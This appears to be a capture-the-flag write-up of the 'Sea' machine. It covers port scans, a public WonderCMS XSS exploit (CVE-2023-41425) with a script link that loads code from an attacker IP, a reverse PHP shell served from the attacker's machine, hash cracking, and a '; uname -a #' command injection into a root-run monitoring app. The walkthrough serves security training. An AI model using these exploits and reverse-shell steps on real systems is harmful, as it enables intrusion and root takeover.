This is an Ubuntu 20.04 machine hosting a web site made with WonderCMS 3.2.0, a version vulnerable to XSS (CVE-2023-41425). Using an exploit available in GitHub we get an initial access as www-data. Then we find a Blowfish hash in a JS configuration file that, once cracked, allows us to move laterally to another user with enough permissions to read the first flag. Regarding escalation, we abuse an internal system monitoring web application under development that is running with root permissions, and turns out to be vulnerable to command injection.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-11 16:49 EDT
Nmap scan report for 10.10.11.28
Host is up, received user-set (0.045s latency).
Not shown: 45417 closed tcp ports (conn-refused), 20116 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds
Enumerate the open ports.
> nmap $target -p22,80 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-11 16:50 EDT
Nmap scan report for 10.10.11.28
Host is up, received user-set (0.044s latency).
Scanned at 2024-08-11 16:50:39 EDT for 14s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e354e072203c014293d1669d900cabe8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZDkHH698ON6uxM3eFCVttoRXc1PMUSj8hDaiwlDlii0p8K8+6UOqhJno4Iti+VlIcHEc2THRsyhFdWAygICYaNoPsJ0nhkZsLkFyu/lmW7frIwINgdNXJOLnVSMWEdBWvVU7owy+9jpdm4AHAj6mu8vcPiuJ39YwBInzuCEhbNPncrgvXB1J4dEsQQAO4+KVH+QZ5ZCVm1pjXTjsFcStBtakBMykgReUX9GQJ9Y2D2XcqVyLPxrT98rYy+n5fV5OE7+J9aiUHccdZVngsGC1CXbbCT2jBRByxEMn+Hl+GI/r6Wi0IEbSY4mdesq8IHBmzw1T24A74SLrPYS9UDGSxEdB5rU6P3t91rOR3CvWQ1pdCZwkwC4S+kT35v32L8TH08Sw4Iiq806D6L2sUNORrhKBa5jQ7kGsjygTf0uahQ+g9GNTFkjLspjtTlZbJZCWsz2v0hG+fzDfKEpfC55/FhD5EDbwGKRfuL/YnZUPzywsheq1H7F0xTRTdr4w0At8=
| 256 f3244b08aa519d56153d6756747c2038 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMMoxImb/cXq07mVspMdCWkVQUTq96f6rKz6j5qFBfFnBkdjc07QzVuwhYZ61PX1Dm/PsAKW0VJfw/mctYsMwjM=
| 256 30b105c64150ff22a37f41060e67fd50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHuXW9Vi0myIh6MhZ28W8FeJo0FRKNduQvcSzUAkWw7z
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds
Download and inspect the README.md file to get info about the CMS.
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview
## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
Once we have disclosed the CMS is WonderCMS, we can obtain the version with curl
Follow the author's instructions: first, run the exploit to generate a xss.js file.
> python3 exploit.py http://10.10.14.28/index.php?page=loginURL 10.10.xxx.xxx 1919
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 1919
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/index.php?page=index.php?page=loginURL?"></form><script+src="http://10.10.14.147:8000/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.28 - - [15/Aug/2024 10:57:11] "GET /xss.js HTTP/1.1" 200 -
Note the /index.php?page=loginURL is taken from the exploit code, and is accessible via Firefox
The exploit outputs a file xss.js and returns a link to be inserted in the contact page. But before, we need to modify the xss.js file since it cannot be used as-is. You have to change the URL where the exploit downloads the shell.php from. By default the exploit points to a Github URL which does not work, so modify the reverse shell URL to point to your machine.
Now start a Python HTTP to serve the shell.php file (for example, use a PentestMonkey PHP shell) and insert the link in the contact.php form.
Shortly after the form is submitted, a request for xss.js file is received on the exploit's listener, along with a request for shell.php on out local Python HTTP server.
Now the reverse shell is stored in /themes/revshell-main/shell.php. Trigger it with curl
Forward to Kali and browse locally with Firefox, a system monitor application appears (use Amay's credentials to login).
Looks like it runs under root context since it allows system management, therefore candidate to command injection. Launch a log file analysis and capture with Burpsuite.
A POST request is sent with 2 parameters log_file and analyze_log.
After trying several payloads, we discover the log_file parameter is vulnerable to command injection.
The format of the payload is the following.
; uname -a #
There must be a blank space after the semicolon, and a hashtag at the end of the line. The semicolon is used to concatenate the commands, whereas the hashtag is necessary to comment anything after it (similar to SQL injections).
With this in mind, let's insert a reverse shell payload with Burpsuite and start a listener to capture it.
The received shell is not very stable but you'll have enough time to dump the root flag.
